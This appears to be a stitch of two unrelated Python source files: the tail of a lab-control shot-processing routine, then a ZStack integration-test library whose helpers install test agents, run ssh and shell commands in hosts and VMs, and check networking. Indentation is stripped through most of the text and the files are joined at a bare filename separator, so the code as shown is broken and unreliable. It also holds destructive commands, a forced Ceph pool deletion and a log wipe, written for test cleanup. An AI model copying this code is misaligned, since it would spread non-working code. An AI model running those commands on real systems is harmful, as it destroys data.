for callback in plugins.get_callbacks('analysis_cancel_send'):
try:
if callback(path):
send_to_analysis = False
break
except Exception:
logger.exception("Plugin callback raised an exception")
# Submit to the analysis server
if send_to_analysis:
self.BLACS.analysis_submission.get_queue().put(['file', path])
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('shot_complete'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
##########################################################################################################################################
# Repeat Experiment? #
##########################################################################################################################################
# check for repeat Filters in Plugins
repeat_shot = self.manager_repeat
for callback in plugins.get_callbacks('shot_ignore_repeat'):
try:
if callback(path):
repeat_shot = False
break
except Exception:
logger.exception("Plugin callback raised an exception")
if repeat_shot:
if ((self.manager_repeat_mode == self.REPEAT_ALL) or
(self.manager_repeat_mode == self.REPEAT_LAST and inmain(self._model.rowCount) == 0)):
# Resubmit job to the bottom of the queue:
try:
    message = self.process_request(path)
    logger.info(message)
except Exception:
    # TODO: make this error popup for the user
    self._logger.exception('Failed to copy h5_file (%s) for repeat run' % path)
self.set_status("Idle")
logger.info('Stopping')
|
test_lib.py
|
'''
Common test library for all integration test stubs.
@author: Youyk
'''
import time
import os
import string
import random
import traceback
import sys
import threading
import uuid
import zstackwoodpecker.setup_actions as setup_actions
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_state as ts_header
import zstackwoodpecker.action_select as action_select
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.deploy_operations as dep_ops
import zstackwoodpecker.operations.vm_operations as vm_ops
import zstackwoodpecker.operations.account_operations as acc_ops
import zstackwoodpecker.operations.volume_operations as vol_ops
import zstackwoodpecker.operations.net_operations as net_ops
import zstackwoodpecker.operations.tag_operations as tag_ops
import zstackwoodpecker.operations.node_operations as node_ops
import zstackwoodpecker.operations.config_operations as conf_ops
import zstackwoodpecker.operations.console_operations as cons_ops
import zstackwoodpecker.operations.license_operations as lic_ops
import zstackwoodpecker.header.vm as vm_header
import zstackwoodpecker.header.volume as vol_header
import zstackwoodpecker.header.image as image_header
import apibinding.api as api
import zstacklib.utils.http as http
import zstacklib.utils.jsonobject as jsonobject
import zstacklib.utils.linux as linux
import zstacklib.utils.lock as lock
import zstacklib.utils.shell as shell
import zstacklib.utils.ssh as ssh
import zstacklib.utils.filedb as filedb
import zstacklib.utils.xmlobject as xmlobject
import zstacklib.utils.debug as debug
import apibinding.inventory as inventory
import zstacktestagent.plugins.vm as vm_plugin
import zstacktestagent.plugins.host as host_plugin
import zstacktestagent.testagent as testagent
debug.install_runtime_tracedumper()
test_stage = ts_header.TestStage
TestAction = ts_header.TestAction
SgRule = ts_header.SgRule
Port = ts_header.Port
WOODPECKER_MOUNT_POINT = '/tmp/zstack/mnt'
SSH_TIMEOUT = 60
class FakeObject(object):
'''
Use to print warning message
'''
def __getitem__(self, name):
raise test_util.TestError("WOODPECKER_TEST_CONFIG_FILE is NOT set, which will be used in ZStack test. It is usually set by zstack-woodpecker when executing integration test or exporting environment parameter when executing python command manually(e.g. WOODPECKER_TEST_CONFIG_FILE=/WOODPECKER_TEST_PATH/virtualrouter/test-config.xml). ")
def __getattr__(self, name):
self.__getitem__(name)
scenario_config_path = os.environ.get('WOODPECKER_SCENARIO_CONFIG_FILE')
if scenario_config_path != None and scenario_config_path != "":
scenario_config_obj = test_util.TestScenario(scenario_config_path)
#Special config in test-config.xml, such as the test ping target.
scenario_config = scenario_config_obj.get_test_config()
#All configs in deploy.xml.
all_scenario_config = scenario_config_obj.get_scenario_config()
#Detailed zstack deployment information, including zones/cluster/hosts...
deploy_scenario_config = all_scenario_config.deployerConfig
#setup_scenario_plan = setup_actions.Plan(all_scenario_config)
else:
scenario_config = None
all_scenario_config = None
scenario_file_path = os.environ.get('WOODPECKER_SCENARIO_FILE')
if scenario_file_path != None and scenario_file_path != "":
scenario_file = scenario_file_path
else:
scenario_file = None
scenario_destroy_path = os.environ.get('WOODPECKER_SCENARIO_DESTROY')
if scenario_destroy_path != None and scenario_destroy_path != "":
scenario_destroy = scenario_destroy_path
else:
scenario_destroy = None
#The following lines are not expected to be changed.
#---------------
test_config_path = os.environ.get('WOODPECKER_TEST_CONFIG_FILE')
if test_config_path:
test_config_obj = test_util.TestConfig(test_config_path)
#Special config in test-config.xml, such as the test ping target.
test_config = test_config_obj.get_test_config()
#All configs in deploy.xml.
all_config = test_config_obj.get_deploy_config()
#Detailed zstack deployment information, including zones/cluster/hosts...
deploy_config = all_config.deployerConfig
setup_plan = setup_actions.Plan(all_config, all_scenario_config, scenario_file)
test_config_obj.expose_config_variable()
#Since the ZStack management server might not be on the same machine as the
#test machine, the management server ip must be set for apibinding/api.py
#before calling ZStack APIs.
if not os.environ.get('ZSTACK_BUILT_IN_HTTP_SERVER_IP'):
os.environ['ZSTACK_BUILT_IN_HTTP_SERVER_IP'] = xmlobject.safe_list(deploy_config.nodes.node)[0].ip_
else:
test_config_obj = FakeObject()
test_config = FakeObject()
all_config = FakeObject()
deploy_config = FakeObject()
setup_plan = FakeObject()
#---------------
#TestHarness defines how tests will try to connect to a VM.
#Default is through the Host. If the host is VMWare, it should be changed to VR.
#---------------
TestHarnessVR = 'VR'
TestHarnessHost = 'HOST'
TestHarness = TestHarnessHost
#---------------
#Test Host Default Ethernet device. It is for zstack management device.
#Please change it to right one.
#---------------
HostDefaultEth = 'eth0'
#---------------
#File name for saving the host L2 IP dictionary. It doesn't need to be changed.
#It will be saved in /var/lib/zstack/filedb/host_l2_ip.db
HostL2IpDb = 'host_l2_ip.db'
def lib_install_testagent_to_host(host, username = None, password = None):
host_pub_ip = host.managementIp
try:
shell.call('echo "quit" | telnet %s 9393|grep "Escape character"' % host_pub_ip)
#shell.call('nc -w1 %s 9393' % host_pub_ip)
test_util.test_logger('Testagent is running on Host: %s . Skip testagent installation.' % host.name)
except:
test_host = test_util.HostOption()
test_host.managementIp = host_pub_ip
if not username:
test_host.username = os.environ.get('hostUsername')
else:
test_host.username = username
if not password:
test_host.password = os.environ.get('hostPassword')
else:
test_host.password = password
test_host.uuid = host.uuid
test_util.test_logger('Testagent is not running on [host:] %s . Will install Testagent.\n' % host.name)
setup_plan.deploy_test_agent(test_host)
def lib_check_system_cmd(command):
'''
Check if system has command.
'''
try:
shell.call('which %s' % command)
test_util.test_logger('find command: %s on system' % command)
return True
except:
test_util.test_warn('not find command: %s on system' % command)
return False
def lib_check_testagent_status(target_ip):
'''
Check if test agent is running on target
'''
return lib_network_check(target_ip, '9393')
def lib_install_testagent_to_vr_with_vr_vm(vr_vm):
vr = test_util.HostOption()
test_util.test_logger("Begin to install testagent to VR: %s" % vr_vm.uuid)
vr.managementIp = lib_find_vr_mgmt_ip(vr_vm)
lib_check_system_cmd('telnet')
#lib_check_system_cmd('nc')
try:
shell.call('echo "quit" | telnet %s 9393|grep "Escape character"' % vr.managementIp)
#shell.call('nc -w1 %s 9393' % vr.managementIp)
test_util.test_logger('Testagent is running on VR: %s . Skip testagent installation.' % vr.managementIp)
except:
vr.username = lib_get_vr_image_username(vr_vm)
vr.password = lib_get_vr_image_password(vr_vm)
vr.uuid = vr_vm.uuid
vr.machine_id = vr_vm.uuid
test_util.test_logger('Testagent is not running on [VR:] %s . Will install Testagent.\n' % vr.managementIp)
setup_plan.deploy_test_agent(vr)
def lib_install_testagent_to_vr(vm):
'''
Install testagent to Vm's VR.
vm: not a vr_vm; it is the vm behind the target VR. To install directly
to a vr_vm, use lib_install_testagent_to_vr_with_vr_vm(vr_vm)
'''
vr_vms = lib_find_vr_by_vm(vm)
for vr_vm in vr_vms:
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
return True
def lib_get_ceph_info(monUrls):
'''
return 1st ceph_host, username, password
'''
mons = monUrls.split(';')
mon1 = mons[0]
user_pass, ceph_host = mon1.split('@')
username, password = user_pass.split(':')
return ceph_host, username, password
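# A minimal sketch of the monUrls format this parser expects (host and
# credentials hypothetical):
# lib_get_ceph_info('root:password@10.0.0.5;root:password@10.0.0.6')
#     -> ('10.0.0.5', 'root', 'password')
# Only the first mon entry is used; any further entries are ignored.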
def lib_install_testgent_to_ceph_host(monUrls):
ceph_host, username, password = lib_get_ceph_info(monUrls)
host = test_util.HostOption()
host.managementIp = ceph_host
test_util.test_logger('Install test agent to ceph host: %s' % ceph_host)
lib_install_testagent_to_host(host, username, password)
def lib_install_testagent_to_ceph_ps():
monUrls = os.environ.get('cephPrimaryStorageMonUrls')
lib_install_testgent_to_ceph_host(monUrls)
def lib_install_testagent_to_ceph_bs():
monUrls = os.environ.get('cephBackupStorageMonUrls')
lib_install_testgent_to_ceph_host(monUrls)
def lib_delete_ceph_pool(ceph_host, username, password, poolname):
command = 'ceph osd pool delete %s %s --yes-i-really-really-mean-it' % \
(poolname, poolname)
lib_execute_ssh_cmd(ceph_host, username, password, command)
def lib_get_ps_ceph_info_by_ps_inventory(ps_inv):
mon_one = ps_inv.mons[0].hostname
for key in os.environ.keys():
if mon_one in os.environ.get(key):
monUrls = os.environ.get(key).split(';')
for mon in monUrls:
if mon_one == mon.split('@')[1]:
username, password = mon.split('@')[0].split(':')
return mon_one, username, password
test_util.test_logger('did not find predefined mon url for ps: %s' % \
ps_inv.uuid)
def lib_get_bs_ceph_info_by_bs_inventory(bs_inv):
mon_one = bs_inv.mons[0].hostname
for key in os.environ.keys():
if mon_one in os.environ.get(key):
monUrls = os.environ.get(key).split(';')
for mon in monUrls:
if mon_one == mon.split('@')[1]:
username, password = mon.split('@')[0].split(':')
return mon_one, username, password
test_util.test_logger('did not find predefined mon url for bs: %s' % \
bs_inv.uuid)
#Clean up log files in the virtual router to free its disk space.
def lib_check_cleanup_vr_logs(vr_vm):
cleanup_cmd = "free_disk=`df --direct /var/log|grep 'var/log'|awk '{print $5}'|awk -F% '{print $1}'`; if [ $free_disk -ge 90 ]; then rm -f /var/log/zstack/*; rm -f /var/log/dnsmasq.log; fi"
vr_vm_mgmt_ip = lib_find_vr_mgmt_ip(vr_vm)
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
lib_execute_sh_cmd_by_agent_with_retry(vr_vm_mgmt_ip, cleanup_cmd)
def lib_check_cleanup_vr_logs_by_vm(vm):
vr_vms = lib_find_vr_by_vm(vm)
for vr_vm in vr_vms:
lib_check_cleanup_vr_logs(vr_vm)
return True
def lib_ssh_vm_cmd_by_agent(test_agent_ip, vm_ip, username, password, command, timeout=SSH_TIMEOUT, retry=1):
cmd = vm_plugin.SshInVmCmd()
cmd.ip = vm_ip
cmd.username = username
cmd.password = password
cmd.command = command
cmd.timeout = timeout
rsp = None
rsp = lib_try_http_cmd(testagent.build_http_path(test_agent_ip, vm_plugin.SSH_GUEST_VM_PATH), cmd, retry)
return rsp
def lib_ssh_vm_cmd_by_agent_with_retry(test_agent_ip, vm_ip, username, password, command, expected_result = True):
'''
Retry the ssh command until it succeeds or SSH_TIMEOUT expires.
Before calling this API, lib_set_vm_host_l2_ip() should be called to set up
the host ip address used to connect to the vm.
'''
timeout = time.time() + SSH_TIMEOUT
rsp = None
while time.time() < timeout:
try:
rsp = lib_ssh_vm_cmd_by_agent(test_agent_ip, vm_ip, username, \
password, command)
if expected_result and not rsp.success:
time.sleep(1)
continue
break
except:
test_util.test_logger('Execute ssh cmd: %s on :%s failed. Will try again in 1s.' % (command, test_agent_ip))
time.sleep(1)
else:
test_util.test_logger('Execute ssh cmd: %s on :%s failed for %s seconds. Give up trying.' % (command, test_agent_ip, SSH_TIMEOUT))
if not rsp:
test_util.test_logger('Met exception when doing ssh [command:] %s in test [vm:] %s through [host:] %s. ' % (command, vm_ip, test_agent_ip))
return False
if not rsp.success:
test_util.test_logger('Fail to execute ssh [command:] %s in test [vm:] %s through [host:] %s. [error:] %s' % (command, vm_ip, test_agent_ip, rsp.error))
return False
if not rsp.result:
return True
return str(rsp.result)
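# Usage sketch (IPs and credentials hypothetical). The helper returns the
# command's stdout as a string, True if there was no stdout, or False on
# failure:
# result = lib_ssh_vm_cmd_by_agent_with_retry('10.0.1.2', '192.168.0.10',
#         'root', 'password', 'hostname')
# if result is False:
#     test_util.test_fail('could not reach vm over ssh')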
def lib_execute_ssh_cmd(host_ip, username, password, command, timeout = 30, \
port = 22):
def ssh_host():
try:
ret, output, stderr = ssh.execute(command, host_ip, username, password, False, port)
print("ssh: %s , return value: %d, standard output:%s, standard error: %s" % (command, ret, output, stderr))
ssh_result['result'] = ret
ssh_result['output'] = output
ssh_result['err'] = stderr
return True
except Exception as e:
test_util.test_logger('[SSH] unable to ssh in host[ip:%s], assume its not ready. Exception: %s' % (host_ip, str(e)))
ssh_result['result'] = 'error'
return False
ssh_result = {'result': None, 'output': None, 'err': None}
thread = threading.Thread(target = ssh_host)
thread.daemon = True
thread.start()
time_out = time.time() + timeout
while ssh_result['result'] == None and time.time() < time_out:
time.sleep(0.5)
if ssh_result['result'] != None:
if ssh_result['result'] == 'error':
test_util.test_logger('ssh command:%s met exception.' % command)
return False
else:
test_util.test_logger('[SSH] ssh in vm[%s] doing %s, timeout after %s seconds' % (host_ip, command, timeout))
return False
test_util.test_logger('[SSH] ssh in vm[%s] doing %s done. result is %s' % (host_ip, command, ssh_result))
if ssh_result['result'] == 0:
return ssh_result['output']
return False
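# Note on lib_execute_ssh_cmd: the ssh call runs in a daemon thread while the
# caller polls ssh_result, so a hung connection cannot block past `timeout`;
# on timeout the thread is abandoned rather than joined.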
def lib_execute_sh_cmd_by_agent(test_agent_ip, command):
shell_cmd = host_plugin.HostShellCmd()
shell_cmd.command = command
rsp = lib_try_http_cmd(testagent.build_http_path(test_agent_ip, \
host_plugin.HOST_SHELL_CMD_PATH), shell_cmd)
return rsp
def lib_execute_sh_cmd_by_agent_with_retry(test_agent_ip, command, \
expected_result = True):
'''
Execute a shell command on a target machine that has the test agent
installed. Retries until success or SSH_TIMEOUT expires; returns False if
no attempt succeeds.
params:
test_agent_ip: target machine ip address.
command: shell command, which will be executed.
return:
False: the shell command execution failed.
True: the shell command executed without stdout
STDOUT_LOG: the stdout log of the shell command.
Before calling this API, lib_set_vm_host_l2_ip() should be called to set up
the host ip address used to connect to the vm.
'''
timeout = time.time() + SSH_TIMEOUT
rsp = None
while time.time() < timeout:
try:
rsp = lib_execute_sh_cmd_by_agent(test_agent_ip, command)
if expected_result and rsp.return_code != 0:
time.sleep(1)
continue
break
except:
test_util.test_logger('Execute shell cmd: %s on :%s failed. Will try again in 1s.' % (command, test_agent_ip))
time.sleep(1)
else:
test_util.test_logger('Execute shell cmd: %s on :%s failed for %s seconds. Give up trying.' % (command, test_agent_ip, SSH_TIMEOUT))
if not rsp:
test_util.test_logger('Execute shell [cmd:] %s ERROR on [target:] %s ' % (command, test_agent_ip))
return False
if rsp.return_code != 0:
test_util.test_logger('Execute shell [cmd:] %s ERROR on [target:] %s [info:] %s' % (command, test_agent_ip, rsp.stderr))
return False
if not rsp.stdout:
return True
#Avoid a possible unicode result: force conversion to str.
return str(rsp.stdout)
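# Usage sketch (agent IP hypothetical):
# uptime = lib_execute_sh_cmd_by_agent_with_retry('10.0.1.2', 'uptime')
# 'uptime' writes to stdout, so a string is expected here; a command with no
# stdout (e.g. 'true') would return True instead.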
#-----------Check VM Status-------------
def lib_check_vm_network_status(vm):
lib_check_vm_running_status(vm)
lib_install_testagent_to_vr(vm)
if lib_check_vm_dhcp(vm):
test_util.test_logger('[vm:] %s mac/ip was assigned in VR /etc/hosts.dhcp' % vm.uuid)
else:
test_util.test_fail('cannot find mac/ip pair in vr for [vm:] %s' % vm.uuid)
lib_check_mac(vm)
lib_check_vm_resolv_conf(vm)
lib_check_ping_gateway(vm)
def lib_check_vm_dhcp(vm):
return _check_dhcp_cmd(vm, 'cat /etc/hosts.dhcp')
def lib_check_dhcp_leases(vm):
return _check_dhcp_cmd(vm, 'cat /etc/hosts.leases')
def _check_dhcp_cmd(vm, command):
vr_vms = lib_find_vr_by_vm(vm)
for vr_vm in vr_vms:
test_util.test_logger("Begin to check VM DHCP binding setting in VR: %s" % vr_vm.uuid)
vr_ip = lib_find_vr_pub_ip(vr_vm)
nic = lib_get_vm_nic_by_vr(vm, vr_vm)
guest_mac = nic.mac
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
rsp = lib_execute_sh_cmd_by_agent(vr_ip, command)
if not rsp.success:
test_util.test_fail('cannot execute shell command: %s in %s. [error:] %s' % (command, vr_ip, rsp.error))
dhcp_res = str(rsp.result)
if not guest_mac in dhcp_res:
test_util.test_logger('[vm:] %s [mac:] %s is not found in %s .' % (vm.uuid, guest_mac, command))
return False
else:
test_util.test_logger('[vm:] %s [mac:] %s is found in %s .' % (vm.uuid, guest_mac, command))
return True
def lib_get_vm_blk_status(vm):
host = lib_get_vm_host(vm)
cmd = vm_plugin.VmStatusCmd()
cmd.vm_uuids = [vm.uuid]
test_util.test_logger('Begin to check [vm:] %s blk status on [host:] %s.' % (vm.uuid, host.name))
rspstr = http.json_dump_post(testagent.build_http_path(host.managementIp, vm_plugin.VM_BLK_STATUS), cmd)
rsp = jsonobject.loads(rspstr)
if rsp.vm_status[vm.uuid]:
test_util.test_logger('vm [uuid:%s] blk status: %s .' % (vm.uuid, jsonobject.dumps(rsp.vm_status[vm.uuid])))
return True
else:
test_util.test_logger('Can not get vm [uuid:%s] blk status.' % vm.uuid)
return False
def lib_check_vm_running_status(vm):
host = lib_get_vm_host(vm)
cmd = vm_plugin.VmStatusCmd()
cmd.vm_uuids = [vm.uuid]
test_util.test_logger('Begin to check [vm:] %s status on [host:] %s.' % (vm.uuid, host.name))
rspstr = http.json_dump_post(testagent.build_http_path(host.managementIp, vm_plugin.IS_VM_RUNNING_PATH), cmd)
rsp = jsonobject.loads(rspstr)
if rsp.vm_status[vm.uuid]:
test_util.test_logger('vm [uuid:%s] is running on host: %s .' % (vm.uuid, host.name))
return True
else:
test_util.test_logger('vm [uuid:%s] is not running on host: %s .' % (vm.uuid,host.name))
return False
def lib_check_vm_stopped_status(vm):
host = lib_get_vm_host(vm)
cmd = vm_plugin.VmStatusCmd()
cmd.vm_uuids = [vm.uuid]
rspstr = http.json_dump_post(testagent.build_http_path(host.managementIp, vm_plugin.IS_VM_STOPPED_PATH), cmd)
rsp = jsonobject.loads(rspstr)
if rsp.vm_status[vm.uuid]:
test_util.test_logger('vm[uuid:%s] is stopped on [host:] %s' % (vm.uuid, host.name))
return True
else:
test_util.test_logger('vm[uuid:%s] is not stopped on [host:] %s . Test failed' % (vm.uuid, host.name))
return False
def lib_check_vm_resolv_conf(vm):
imageUsername = lib_get_vm_username(vm)
imagePassword = lib_get_vm_password(vm)
vr_vms = lib_find_vr_by_vm(vm)
for vr_vm in vr_vms:
test_util.test_logger("Begin to check VM DNS setting behind of VR: %s" % vr_vm.uuid)
nic = lib_get_vm_nic_by_vr(vm, vr_vm)
if TestHarness == TestHarnessHost:
test_harness_ip = lib_find_host_by_vm(vm).managementIp
#assign host l2 bridge ip.
lib_set_vm_host_l2_ip(vm)
else:
test_harness_ip = lib_find_vr_mgmt_ip(vr_vm)
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
guest_ip = nic.ip
command = 'cat /etc/resolv.conf'
username = lib_get_vm_username(vm)
password = lib_get_vm_password(vm)
rsp = lib_ssh_vm_cmd_by_agent(test_harness_ip, guest_ip, username, \
password, command)
if not rsp.success:
test_util.test_fail('cannot execute test ssh command in test vm. [error:] %s' % rsp.error)
dns_res = str(rsp.result)
vr_guest_ip = lib_find_vr_private_ip(vr_vm)
if vr_guest_ip in dns_res:
test_util.test_logger('[VR IP:] %s is set in guest vm /etc/resolv.conf of guest:%s . VM network checking pass.' % (vr_guest_ip, dns_res))
else:
test_util.test_fail('[VR IP:] %s is not set in guest vm; content of /etc/resolv.conf of guest: %s' % (vr_guest_ip, dns_res))
#TODO: add check vlan operations.
def lib_check_vlan(vm):
pass
#Connection failures are possible under stress testing, so repeat the same command several times.
def lib_try_http_cmd(http_path, cmd, times=5):
interval = 1
current_round = 1
exception = None
# Avoid waiting too long for a connection that will never succeed
timeout = time.time() + SSH_TIMEOUT
while current_round <= times and time.time() < timeout:
try:
current_round += 1
rspstr = http.json_dump_post(http_path, cmd)
rsp = jsonobject.loads(rspstr)
test_util.test_logger('http call response result: %s' % rspstr)
return rsp
except Exception as e:
test_util.test_logger('met an error when calling the zstack test agent API, will try again... the trace logs are:')
traceback.print_exc(file=sys.stdout)
exception = e
time.sleep(1)
test_util.test_logger('Error. [http connection:] %s with [command:] %s failed after %s attempts.' % (http_path, cmd.command, times))
raise test_util.TestError(str(exception))
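# lib_try_http_cmd caps both the number of attempts (`times`) and the wall
# clock time (SSH_TIMEOUT); the first successful response is returned
# immediately, and the last exception is re-raised as a TestError once both
# budgets are exhausted.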
#check guest mac address and ip address
def lib_check_mac(vm):
vr_vms = lib_find_vr_by_vm(vm)
for vr_vm in vr_vms:
test_util.test_logger("Begin to check IP/MAC for [VM:] %s behind of [VR:] %s" % (vm.uuid, vr_vm.uuid))
nic = lib_get_vm_nic_by_vr(vm, vr_vm)
guest_ip = nic.ip
guest_mac = nic.mac
if TestHarness == TestHarnessHost:
test_harness_ip = lib_find_host_by_vm(vm).managementIp
#assign host l2 bridge ip.
lib_set_vm_host_l2_ip(vm)
else:
test_harness_ip = lib_find_vr_mgmt_ip(vr_vm)
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
command = '/sbin/ip a'
username = lib_get_vm_username(vm)
password = lib_get_vm_password(vm)
rsp = lib_ssh_vm_cmd_by_agent(test_harness_ip, guest_ip, username, \
password, command)
if not rsp.success:
test_util.test_fail('Cannot execute test ssh command in test vm through [ip:] %s. [error:] %s' % (test_harness_ip, rsp.error))
ip_res = str(rsp.result)
if (guest_mac in ip_res) or (string.upper(guest_mac) in ip_res):
test_util.test_logger('[MAC:] %s is set in guest vm, guest IP is: %s . VM MAC checking pass.' % (guest_mac, guest_ip))
#test_util.test_logger('ifconfig result: %s' % ip_res)
else:
test_util.test_fail('[MAC:] %s is not found in guest vm, guest IP is:%s . VM MAC checking fail.' % (guest_mac, guest_ip))
def lib_is_vm_vr(vm):
'''
Return True if vm is an appliance vm.
'''
cond = res_ops.gen_query_conditions('uuid', '=', vm.uuid)
vr = res_ops.query_resource(res_ops.APPLIANCE_VM, cond)
if vr:
return True
#login vm and ping target
def lib_check_ping(vm, target, no_exception=None):
'''target is IP address or hostname'''
vr_vms = lib_find_vr_by_vm(vm)
command = 'ping -c 3 -W 5 %s >/tmp/ping_result 2>&1' % target
if lib_is_vm_vr(vm):
vm_ip = lib_find_vr_pub_ip(vm)
lib_install_testagent_to_vr_with_vr_vm(vm)
if lib_execute_sh_cmd_by_agent_with_retry(vm_ip, command):
test_util.test_logger("Ping [target:] %s from [vm:] %s Test Pass" % (target, vm.uuid))
else:
# Note: rsp is not defined in this branch, so rsp.error cannot be reported.
if not no_exception:
    test_util.test_fail("Fail: [vm:] %s ping target: %s fail." % (vm.uuid, target))
else:
    test_util.test_logger("Fail: [vm:] %s ping target: %s fail." % (vm.uuid, target))
    return False
else:
vr_vm = vr_vms[0]
nic = lib_get_vm_nic_by_vr(vm, vr_vm)
guest_ip = nic.ip
if TestHarness == TestHarnessHost:
test_harness_ip = lib_find_host_by_vm(vm).managementIp
#assign host l2 bridge ip.
lib_set_vm_host_l2_ip(vm)
test_util.test_logger('test_harness ip: %s' % test_harness_ip)
else:
test_harness_ip = lib_find_vr_mgmt_ip(vr_vm)
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
test_util.test_logger("Begin to test ping target: %s from VM through L3 behind of VR: %s by connection from test_harness: %s" % (target, vr_vm.uuid, test_harness_ip))
username = lib_get_vm_username(vm)
password = lib_get_vm_password(vm)
rsp = lib_ssh_vm_cmd_by_agent(test_harness_ip, guest_ip, username, \
password, command)
if not rsp.success:
if not no_exception:
test_util.test_fail("Fail: [vm:] %s ping target: %s fail. [error:] %s" %(vm.uuid, target, rsp.error))
else:
test_util.test_logger("Fail: [vm:] %s ping target: %s fail. [error:] %s" %(vm.uuid, target, rsp.error))
return False
test_util.test_logger("Ping [target:] %s from [vm:] %s Test Pass" % (target, vm.uuid))
#return True
return True
def lib_check_directly_ping(target_ip):
try:
shell.call('ping -c 1 -W 1 %s' % target_ip)
except:
test_util.test_logger('ping %s failed' % target_ip)
return False
else:
test_util.test_logger('ping %s successfully' % target_ip)
return True
#login vm and ping gateway
def lib_check_ping_gateway(vm, no_exception=None):
'''
Ping gateway.
'''
return lib_check_ping(vm, vm.vmNics[0].gateway, no_exception)
def lib_check_ping_external_machine(vm, no_exception=None):
'''
Ping the pre-set external machine from plan.xml.
Checks whether dns and dhcp are set correctly.
'''
return lib_check_ping(vm, test_config.pingTestTarget.text_, no_exception)
def lib_scp_file_to_vm(vm, src_file, dst_file, l3_uuid = None):
'''
scp source file to destination in vm.
@params:
vm: target vm
src_file: source file in current host
dst_file: destination file name in vm. dst_folder should be ready.
l3_uuid: the optional l3 uuid for find target vm's nic
@return:
scp response object: scp successfully
False: scp failed
'''
def _full_path(path):
if path.startswith('~'):
return os.path.expanduser(path)
elif path.startswith('/'):
return path
else:
    # `self` is undefined in this module-level helper, so resolve
    # relative paths against the current working directory instead.
    return os.path.abspath(path)
if os.environ.get('zstackManagementIp') == None:
lib_set_vm_host_l2_ip(vm)
host_ip = lib_find_host_by_vm(vm).managementIp
target_host_in_plan = None
for host_in_plan in lib_get_all_hosts_from_plan():
if host_in_plan.managementIp_ == host_ip:
target_host_in_plan = host_in_plan
break
if target_host_in_plan != None:
h_username = target_host_in_plan.username_
h_password = target_host_in_plan.password_
if hasattr(target_host_in_plan, 'port_'):
h_port = int(target_host_in_plan.port_)
else:
h_port = 22
else:
h_username = os.environ.get('hostUsername')
h_password = os.environ.get('hostPassword')
h_port = 22
temp_script = '/tmp/%s' % uuid.uuid1().get_hex()
#copy the target script to target host firstly.
src_file = _full_path(src_file)
ssh.scp_file(src_file, temp_script, host_ip, h_username, h_password, port=h_port)
username = lib_get_vm_username(vm)
password = lib_get_vm_password(vm)
if not l3_uuid:
vm_ip = vm.vmNics[0].ip
else:
vm_ip = lib_get_vm_nic_by_l3(vm, l3_uuid).ip
#copy the target script to target vm
scp_cmd = vm_plugin.SshInVmCmd()
scp_cmd.ip = vm_ip
scp_cmd.username = username
scp_cmd.password = password
scp_cmd.src_file = temp_script
scp_cmd.dst_file = dst_file
rspstr = http.json_dump_post(testagent.build_http_path(host_ip, vm_plugin.SCP_GUEST_VM_PATH), scp_cmd)
rsp = jsonobject.loads(rspstr)
if not rsp.success:
test_util.test_logger('scp error info: %s' % rsp.error)
return False
#Clean up the temporary script on the host.
ssh.execute('rm -f %s' % temp_script, host_ip, h_username, h_password, port=h_port)
return rsp
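# Usage sketch (paths hypothetical): copy a local script into a vm, failing
# the test if the copy does not succeed:
# rsp = lib_scp_file_to_vm(vm, '~/scripts/check.sh', '/tmp/check.sh')
# if rsp is False:
#     test_util.test_fail('scp to vm failed')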
def lib_execute_shell_script_in_vm(vm_inv, script_file, l3_uuid=None, timeout=SSH_TIMEOUT):
'''
Execute a shell script in a vm. Only uses the vm's host to ssh into the vm.
@params:
vm_inv: target vm to execute the script file
script_file: the local script file, which will be copied to and run on the
target vm.
l3_uuid: [optional] l3_uuid for target vm's nic. It is used when the VM has
multiple nics.
timeout: [default:60s] the script must complete within this timeout.
@return:
ssh response object: Pass
False: ssh fail
'''
lib_set_vm_host_l2_ip(vm_inv)
host_ip = lib_find_host_by_vm(vm_inv).managementIp
h_username = os.environ.get('hostUsername')
h_password = os.environ.get('hostPassword')
temp_script = '/tmp/%s' % uuid.uuid1().get_hex()
if not lib_scp_file_to_vm(vm_inv, script_file, temp_script, l3_uuid):
return False
if not l3_uuid:
vm_ip = vm_inv.vmNics[0].ip
else:
vm_ip = lib_get_vm_nic_by_l3(vm_inv, l3_uuid).ip
command = 'sh %s' % temp_script
username = lib_get_vm_username(vm_inv)
password = lib_get_vm_password(vm_inv)
rsp = lib_ssh_vm_cmd_by_agent(host_ip, vm_ip, username, \
password, command, timeout)
if not rsp.success:
test_util.test_logger('ssh error info: %s when execute [script:] %s in [vm:] %s ' % (rsp.error, open(script_file).readlines(), vm_inv.uuid))
return False
test_util.test_logger('Successfully execute [script:] >>> %s <<< in [vm:] %s' % \
(script_file, vm_inv.uuid))
test_util.test_logger(str(rsp.result))
#Clean up the temporary script on the host.
ssh.execute('rm -f %s' % temp_script, host_ip, h_username, h_password)
return rsp
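# Usage sketch (script path hypothetical):
# rsp = lib_execute_shell_script_in_vm(vm_inv, '/root/io_test.sh', timeout=120)
# if rsp and rsp.result:
#     test_util.test_logger('script output: %s' % rsp.result)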
def lib_execute_command_in_vm(vm, cmd, l3_uuid=None):
'''
The cmd is assumed to return quickly.
'''
vr_vm = lib_find_vr_by_vm(vm)
ret = True
#if vr_vm[0].uuid == vm.uuid:
# lib_install_testagent_to_vr_with_vr_vm(vm)
# try:
# vm_ip = lib_find_vr_mgmt_ip(vm)
# vr_vm = vm
# except:
# test_util.test_logger("[vm:] %s is not a VR or behind any VR. Can't connect to it to execute [cmd:] %s " % (vm.uuid, cmd))
# return False
# shell_cmd = host_plugin.HostShellCmd()
# shell_cmd.command = cmd
# rspstr = http.json_dump_post(testagent.build_http_path(vm_ip, host_plugin.HOST_SHELL_CMD_PATH), shell_cmd)
# rsp = jsonobject.loads(rspstr)
# if rsp.return_code != 0:
# ret = False
# test_util.test_logger('shell error info: %s' % rsp.stderr)
# else:
# ret = rsp.stdout
#else:
# vr_vm = vr_vm[0]
# if TestHarness == TestHarnessHost:
# #assign host l2 bridge ip.
# lib_set_vm_host_l2_ip(vm)
# test_harness_ip = lib_find_host_by_vm(vm).managementIp
# else:
# test_harness_ip = lib_find_vr_mgmt_ip(vr_vm)
